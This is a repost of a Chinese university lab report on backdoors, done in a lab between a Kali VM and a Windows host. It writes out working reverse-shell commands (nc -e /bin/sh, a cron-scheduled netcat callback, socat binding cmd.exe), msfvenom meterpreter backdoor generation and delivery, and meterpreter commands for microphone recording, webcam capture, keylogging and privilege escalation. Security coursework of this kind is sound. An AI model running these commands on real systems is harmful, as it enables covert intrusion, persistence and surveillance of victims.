2018-2019 Exp2 后门原理与实践
2018-2019 Exp2 后門原理與實踐
目錄
一、實驗內(nèi)容說明及基礎問題回答
二、工具準備
- 查看WindowsIP和LinuxIP
- Windows獲得Linuxshell
- Linux 獲得Windows shell
- 使用nc傳輸數(shù)據(jù)
三、實驗過程
- 使用netcat獲取主機操作Shell,cron啟動
- 使用socat獲取主機操作Shell, 任務計劃啟動
- 使用MSF meterpreter(或其他軟件)生成可執(zhí)行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
- 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內(nèi)容,并嘗試提權
- 可選加分內(nèi)容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell
四、問題與思考
一、實驗內(nèi)容說明及基礎問題回答
1、實驗內(nèi)容
(1)使用netcat獲取主機操作Shell,cron啟動 (0.5分)
(2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分)
(3)使用MSF meterpreter(或其他軟件)生成可執(zhí)行文件,利用ncat或socat傳送到主機并運行獲取主機Shell(0.5分)
(4)使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內(nèi)容,并嘗試提權 (2分)
(5)可選加分內(nèi)容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell(1分)加分內(nèi)容一并寫入本實驗報告。
2、基礎問題回答
1)例舉你能想到的一個后門進入到你系統(tǒng)中的可能方式?
- 破解Linux計算機賬號密碼
- 替換login程序,提供特殊口令隱身登錄
- 在文件系統(tǒng)中隱藏后門
(2)例舉你知道的后門如何啟動起來(win及l(fā)inux)的方式?
- Linux:通過crontab功能將木馬設置為定時啟動,控制主機保持監(jiān)聽狀態(tài)就能周期性啟動后門,也可以通過對正常然健的綁定注入shellcode開啟后門。
- win:被動下載或接受后門程序,當受害方點擊運行該程序后門便會啟動。
(3)Meterpreter有哪些給你映像深刻的功能?
- 基本功能(基本的連接、執(zhí)行指令)
- 擴展功能(如搜集用戶信息、安裝服務等功能)
(4)如何發(fā)現(xiàn)自己有系統(tǒng)有沒有被安裝后門?
- 安裝殺毒軟件:可以進行實時防護,如老師課堂演示中在開啟軟件保護模式情況下,若有后門可疑程序會即刻將其刪除。
- 檢測網(wǎng)絡連接:查看是否有IP與本機建立連接
返回目錄
二、工具準備
查看WindowsIP和LinuxIP
Windows下用命令ipconfig
Linux下用ifconfig
Windows獲得Linuxshell
使用ncat程序,輸入ncat.exe -l -p 5226監(jiān)聽本機5226端口
在kali中使用nc指令的-e選項,輸入nc 172.30.2.26 5226 -e /bin/sh反向連接Windows主機的5226端口
在Windows端,獲得kali的shell
Linux 獲得Windows shell
使用nc指令監(jiān)聽5226端口
在Windows下,使用ncat.exe程序的-e選項反向連接kali主機的5226端口
此時kali可以看到Windows的命令提示,可以輸入相關Windows命令(此處輸入的是dir)
使用nc傳輸數(shù)據(jù)
Windows監(jiān)聽5226端口
Kali下連接到Windows的5226端口
建立連接后傳輸數(shù)據(jù)
返回目錄
三、實驗過程
使用netcat獲取主機操作Shell,cron啟動
在Windows下監(jiān)聽5226端口
在kali中,用crontab -e編輯一條定時任務,選擇編輯器3
在最后一行添加30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh,意思是在每小時的第30分鐘反向連接Windows主機的5226端口
時間到了23:30時,已經(jīng)獲得kali的shell,可以輸入指令
使用socat獲取主機操作Shell, 任務計劃啟動
socat是ncat的增強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。
socat的基本功能就是建立兩個雙向的字節(jié)流,數(shù)據(jù)就在其間傳輸,參數(shù)address就是代表了其中的一個方向。所謂流,代表了數(shù)據(jù)的流向,而數(shù)據(jù)則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數(shù)據(jù)流進行限定與說明。
在win10系統(tǒng)下,右擊屏幕左下角windows圖標,選擇“計算機管理”(或者直接搜索“計算機管理”)
在任務計劃程序創(chuàng)建任務,填寫任務名稱,并新建一個觸發(fā)器
在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數(shù)一欄填寫tcp-listen:5226 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口5226,同時把cmd.exe的stderr重定向到stdout上
創(chuàng)建完成之后,按Windows+L快捷鍵鎖定計算機,再次打開時,找到你創(chuàng)建的任務雙擊后,可以發(fā)現(xiàn)之前創(chuàng)建的任務已經(jīng)開始運行
此時,在Kali環(huán)境下輸入指令socat - tcp:172.30.2.26:5226,這里的第一個參數(shù)-代表標準的輸入輸出,第二個流連接到Windows主機的5226端口,此時可以發(fā)現(xiàn)已經(jīng)成功獲得了一個cmd shell
使用MSF meterpreter生成可執(zhí)行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.130 LPORT=5226 -f exe > 20165226_backdoor.exe生成后門程序
注意此時IP地址為LinuxIP
- Windows下執(zhí)行ncat.exe -lv 5226 > 20165226_backdoor.exe,進入接受模式
Linux中執(zhí)行nc 172.30.2.26 5226 < 20165226_backdoor.exe,注意關閉病毒查殺軟件
此時IP地址為主機即WindowsIP
傳送接收文件成功
在kali中打開終端,輸入msfconsole指令進入msf控制臺
輸入use exploit/multi/handler進入監(jiān)聽模塊
輸入set payload windows/meterpreter/reverse_tcp設置payload
依次輸入set LHOST 192.168.170.130和set LPORT 5226設置IP及端口
注意此時IP地址為LinuxIP,和生成後門程序時指定的IP相同
設置完成,開始監(jiān)聽exlpoit
運行Windows下的后門程序
kali已經(jīng)獲得Windows主機的連接,并得到遠程控制的shell
使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內(nèi)容
使用record_mic指令可以截獲一段音頻
使用webcam_snap指令可以使用攝像頭進行拍照
使用screenshot指令可以進行截屏
使用keyscan_start指令開始記錄下?lián)翩I的過程,使用keyscan_dump指令讀取擊鍵的記錄
先使用getuid指令查看當前用戶,使用getsystem指令進行提權
可選加分內(nèi)容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell
使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.170.128 LPORT=5226 -x /root/20165226/exp2/pwn1 -f elf > 5226pwn生成以pwn1模板這個elf文件格式的shellcode文件5226pwn
- 輸入指令msfconsole,進入msf命令行
- 在kali上運行后門文件5226pwn,在kali中執(zhí)行pwn2時應先加權限 chmod +x 5226pwn
- 此時攻擊者Linux上已經(jīng)獲得了被攻擊者Linux的連接,并且得到了遠程控制的shell
返回目錄
四、問題與思考
問題1:kali使用nc反彈連接后主機沒有任何顯示
問題1解決方案:在空白處輸入命令,如ls等,再回車即可
- 問題2:kali中使用cron啟動,但在編輯的時間點并未獲取kali的shell
問題2解決方案:
通過重新查看編輯文件,發(fā)現(xiàn)并未寫入端口號
于是將最后一行改為30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh
問題3:在進行第二個socat實驗時未成功獲得cmd shell
問題3解決方案:通過校對命令行,發(fā)現(xiàn)輸入命令時將-和tcp:連在一起了,正確書寫為socat - tcp:....,一定注意之間的空格
問題4:MSF監(jiān)聽時最后無法獲取信息
問題4解決方案:發(fā)現(xiàn)是在IP設置時出現(xiàn)問題,重新啟動終端將步驟從頭調(diào)試。
返回目錄
轉載于:https://www.cnblogs.com/musea/p/10562698.html
總結
以上是生活随笔為你收集整理的2018-2019 Exp2 后门原理与实践的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Zabbix服务端的安装及使用
- 下一篇: 【从蛋壳到满天飞】JS 数据结构解析和算